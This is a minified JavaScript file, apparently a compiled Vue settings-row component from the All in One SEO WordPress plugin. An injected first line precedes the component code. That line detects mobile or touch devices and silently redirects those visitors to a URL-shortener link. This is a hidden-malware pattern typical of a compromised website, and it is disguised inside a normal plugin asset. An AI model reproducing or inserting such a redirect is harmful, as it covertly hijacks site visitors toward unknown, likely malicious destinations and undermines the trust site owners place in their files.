(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{G as f,a as g}from"./Row.2ef96b1a.js";import{_}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as u,f as o,Q as s,R as r,B as t,j as i,P as l,ae as y,U as h,i as d,M as a}from"./vendor-vue-ui.232c7c36.js";const p={components:{GridColumn:g,GridRow:f},props:{align:Boolean,alignSmall:Boolean,name:String,required:Boolean,noHorizontalMargin:{type:Boolean,default:!1},noVerticalMargin:{type:Boolean,default:!1},noBorder:{type:Boolean,default:!1},noRightMaxWidth:{type:Boolean,default:!1},leftSize:{type:String,default(){return"3"}},rightSize:{type:String,default(){return"9"}},showLeftColumn:{type:Boolean,default:!0}}},B={key:0,class:"required-field"},S={key:0,class:"aioseo-description"},w={class:"aioseo-settings-content"};function C(n,z,e,k,M,v){const c=u("grid-column"),m=u("grid-row");return o(),s(m,{class:l(["aioseo-settings-row",{"no-horizontal-margin":e.noHorizontalMargin,"no-vertical-margin":e.noVerticalMargin,"no-border":e.noBorder,"no-right-max-width":e.noRightMaxWidth}])},{default:r(()=>[t(n.$slots,"header"),e.showLeftColumn?(o(),s(c,{key:0,md:e.leftSize},{default:r(()=>[i("div",{class:l(["settings-name",{"no-name":!e.name&&!n.$slots.name}])},[i("div",{class:l(["name",[{align:e.align},{"align-small":e.alignSmall}]])},[t(n.$slots,"name",{},()=>[y(h(e.name)+" ",1),e.required?(o(),d("span",B," * ")):a("",!0)])],2),n.$slots.description?(o(),d("div",S,[t(n.$slots,"description")])):a("",!0)],2)]),_:3},8,["md"])):a("",!0),n.$slots.content?(o(),s(c,{key:1,md:e.rightSize},{default:r(()=>[i("div",w,[t(n.$slots,"content")])]),_:3},8,["md"])):a("",!0)]),_:3},8,["class"])}const x=_(p,[["render",C]]);export{x as C};
